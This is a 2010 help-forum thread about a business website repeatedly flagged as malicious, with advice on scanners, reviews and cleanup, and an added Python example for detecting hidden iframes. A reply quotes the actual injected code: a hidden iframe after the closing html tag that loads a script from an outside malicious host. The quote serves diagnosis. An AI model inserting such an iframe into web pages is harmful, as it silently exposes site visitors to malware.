Re: Clean site listed as suspicious!

Re: Clean site listed as suspicious! Kaleh 2/20/10 5:34 AM
The site was launched way over a year ago and the last update to files on the site was made back in October 09.
About a month ago the site was marked as harmful or suspicious. We've checked the site with all possible online scan utilities (Norton, McAfee and a few others). They all came out clean.

FWIW, every scan utility works differently and focuses on different types of issues.  None of them are capable of detecting every possible problem.  A "clean" scan with any utility only means that the particular utility did not detect the types of things that it checks for at that particular point in time.  It does not mean that another scanner is "wrong" if that other scanner identified an issue. It also does not mean that another scanner is "wrong" if you find several other scanners that provide you with a "clean" result.

As far as SiteAdvisor and SafeWeb go, when they check a site and provide a "clean" report that is accessible to anyone that goes to their site to see what kind of information is there, I have never seen a date associated with their report.  Without knowing the date that report was generated, no one has any idea how current that information is.  Sites are hacked constantly.  A site that was fine five minutes ago, may not be OK right now.

There is a lot more to evaluating a site that has been identified as suspicious/malicious than using free on-line scanning tools.  If you had not already utilized a guide that steps you through the process of thoroughly evaluating your site, it is never too late to start.  If you aren't able to identify the problem on your own (or with help from those on forums such as this), you may need to consider hiring someone who will have full access to your site, to work on the issue.

Tips for Cleaning & Securing your Website -

How to remove the "This site may harm your computer"

How to prevent your site from getting hacked. How to repair a damaged site. Website security precautions

We've posted a review request to Google on Jan 10, 2010 and didn't get a single reply.

Did you check for messages in your Webmaster Tools account?  Did you actually "Request a Review" and not "Site Reconsideration?"  Unless you have set up message forwarding in Webmaster Tools, you may not get any updates, other than those provided through Webmaster Tools.  The initial notification that the site is being flagged will be sent to a variety of rather "generic" email addresses that are commonly used by site owners/administrators, unless message forwarding has been enabled and Google knows exactly where to send such automated communication.

Then, I went to the StopBadWare website and requested the review there. It took them a month!!!! to review it (site lost tons of business) and their e-mail to us was basically: "site is clean, harmful flag has been removed". Wow.. geee.. thanks.

When StopBadware receives a request for an independent review, the first thing they do is request a review from Google.  The records in their database are updated on a regular basis with the data provided through Google's SafeBrowsing database.  If Google has cleared the site by the time that StopBadware requests that review from Google, StopBadware will close the review based upon the fact that the "partner" is no longer flagging the site. In this case, it is not StopBadware pronouncing the site clean ... it is Google.  When they request a review from Google, and the site is still flagged, there are subsequent steps that are taken.  The length of time to complete that review varies, but I can't speak for StopBadware about how involved their review became in this particular case.  However, the end result does not appear to be that StopBadware decided your site was clean ... it appears that during one of Google's scans they cleared the site, and StopBadware updated their records to reflect that.

A month later, a false tagging by Google cost our business a lot of money. Ok, it was removed... next day, it's tagged as harmful again! What the hell is going on? Is this a joke?

It is very rare for a situation that is considered to be a "false tagging" by a site owner to truly be an error. Most people who come here with that type of concern are quickly shown where the problems are.  Some situations are more challenging though, and it is more difficult for someone on the outside to be able to identify the problem. Rotating ads, among other possibilities, are often the cause of intermittent issues with a site being flagged.  Sometimes the problem is with an intermittent problem that is a server-wide issue that affects more than just a single site.  The hackers are getting more and more sophisticated with the methods they use to evade detection, making some situations very challenging to troubleshoot and subsequently causing site owners to believe that there is not (and never was) a problem, even when it can eventually be proven that there was a legitimate issue.

Google has encountered suspicious behavior on your site 9 times in the last 90 days.  If you have not done any site clean-up during that point in time, and there was any point during which your site was not flagged, it is very highly likely that something is going on that is random in nature.  As previously mentioned, there can be a number of possibilities that cause the intermittent behavior, that make troubleshooting very challenging.  Unfortunately, I don't see any indication that you have previously posted here or on the BadwareBusters forum (associated with StopBadware) allowing anyone to try to help you nail this down.

Ok, knowing the fact that Google doesn't care about anybody and uses its gestapo style site flagging sites, I decided to submit another review to StopBadWare.

But oh no! I can't! That's what StopBadWare says:

Review requested: Jan 11th 2010
Review closed: Feb 16th 2010
Review status: closed-URL no longer reported by StopBadware partners

There can be a lag in time before StopBadware updates their records to reflect the current status that Google has for the site.  If the site is bouncing back and forth when Google scans it, there will be more inconsistency in what you see through StopBadware.  However, instead of waiting for StopBadware to update their records and make an independent review available to you, I would suggest that you initiate that review through your Google Webmaster Tools account.  Better yet, you should really use the resource material available to thoroughly evaluate your site and make sure that you have addressed all possible vulnerabilities that could be causing you a problem now (or in the future.)  Then ... "Request a Review" through Google Webmaster Tools.

You should also check Webmaster Tools [Labs | Malware Details] to see if Google has provided any helpful information there.  In addition, you should check the red malware warning bar on your Webmaster Tools Dashboard for the [More details] link which should display a page where Google may have identified sample pages that they had issues with.

GOOGLE! WHAT IS GOING ON! It's not the first business I saw this happen to. I smell a VERY large lawsuit coming up. But it would be nice to get some answers first.

Site owners do sometimes come here presenting a one-sided view of their situation, and claim their site has been "unfairly flagged" before they give anyone an opportunity to try to help.  Quite often, they come here to vent, and do not bother to provide enough detail for readers (or the volunteer helpers here) to be able to look into the situation for themselves.  Most of those who participate in the process of information sharing and allow others to try to work with them, do find that there was a problem that needed to be resolved.  It's difficult to say whether there is substance to other complaints, as they do not come back to participate in an interactive dialogue with anyone.  There's usually two sides to every story ... but sometimes we only hear one side of the story here, because the OP is only interested in complaining, not in working their way through the situation.

That said, perhaps others will be able to find something for you to latch onto, as far as why your site is being flagged.  However, even if they don't, that still does not mean that Google is wrong.  It may just be that without full access to your site, no one is going to be able to get to the bottom of the issue.

Re: Clean site listed as suspicious! Phil Payne 2/22/10 1:41 PM
Re: Clean site listed as suspicious! terekidi 2/22/10 1:51 PM
I know, but it's clean. I've just submitted another review request.
Re: Clean site listed as suspicious! JohnMu 2/22/10 1:57 PM
Hi terekidi
When we last checked your site's URL (on Feb 20) at  https://pazzoracing. com/ we found the following at the bottom of the page:
</html><iframe src="http://u0r. in:8080/ts/in.cgi?pepsi105" width=125 height=125 style="visibility: hidden"></iframe>
The site included through the "iframe" element appears to be or to have been malicious.

I assume this is not content that you added yourself, so I would recommend working out where it might be coming from or how someone was able to add it to your site. If you did not remove this yourself, I would recommend contacting your hoster to find out more.

Hope it helps!
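
The finding above (an invisible iframe appended after the closing `</html>` tag) can be checked for mechanically. The following is an added example, not part of the thread or any poster's code; `audit_page`, the host names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
CLOSE_HTML = re.compile(r"</html\s*>", re.I)

class IframeAudit(HTMLParser):
    """Collect iframes that load another host or are styled to be invisible."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("external-host")
        if HIDDEN.search(a.get("style", "")):
            reasons.append("hidden-style")
        if reasons:
            self.findings.append((host, reasons))

def audit_page(html, site_host):
    """Return suspicious iframes plus any markup found after the last </html>."""
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    closes = list(CLOSE_HTML.finditer(html))
    trailing = html[closes[-1].end():].strip() if closes else ""
    return {"iframes": parser.findings, "after_close_html": trailing}

# Constructed sample: a normal page with one legitimate same-site iframe, then
# an injected hidden iframe after </html> (placeholder host, not a real one).
SAMPLE_PAGE = (
    '<html><body><h1>Parts</h1>'
    '<iframe src="https://shop.example/map" width="400" height="300"></iframe>'
    '</body></html>'
    '<iframe src="http://injected.example:8080/ts/in.cgi?x" width=125 height=125 '
    'style="visibility: hidden"></iframe>\n'
)

if __name__ == "__main__":
    print(audit_page(SAMPLE_PAGE, "shop.example"))
```

Because the flagging discussed in this thread was intermittent, a single clean result from a check like this says nothing about other times; it is only useful when run repeatedly against what the server actually returns.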
Re: Clean site listed as suspicious! terekidi 2/22/10 2:05 PM
As I said before, we had one techie help us, and as far as I can see, the site is clean. Could you verify that?
I think it should be good now and if yes, when can it be marked as "safe" again?
Re: Clean site listed as suspicious! webado 2/22/10 10:18 PM
Did you find how the malware had gotten onto the site? What steps did you take to clean it up and to prevent future incidents? If you did nothing then it's a fluke that the site appears clean now and malware will recur randomly. You need to plug the hole.
Re: Clean site listed as suspicious! terekidi 2/22/10 10:58 PM
We had a tech specialist do some intensive work to illuminate the issue (which I think he did), all passwords have been also changed (FTP, database, Control Panel).
So yes, the malware was removed and the new passwords are set. The passwords will be changed more frequently.
Re: Clean site listed as suspicious! Kaleh 2/23/10 2:34 AM
Currently, one of the more common causes of sites being hacked is that a PC used to access the site for administration purposes is infected. Did you check local machines for malware that may be capturing the login credentials?  You may need to use multiple products, to find the right one, to detect and remove this type of malware from the local machine.

This is one of several references related to the type of iframe reference that was found on your site:
Re: Clean site listed as suspicious! terekidi 2/23/10 8:26 AM
I don't use PCs anymore. Since December I switched to Mac. I am well aware of the trojan viruses that steal passwords for CuteFTP and other software and also viruses that can intercept any connections on the network. It should be all good now.

Btw, thanks Google - the site is now marked as Safe!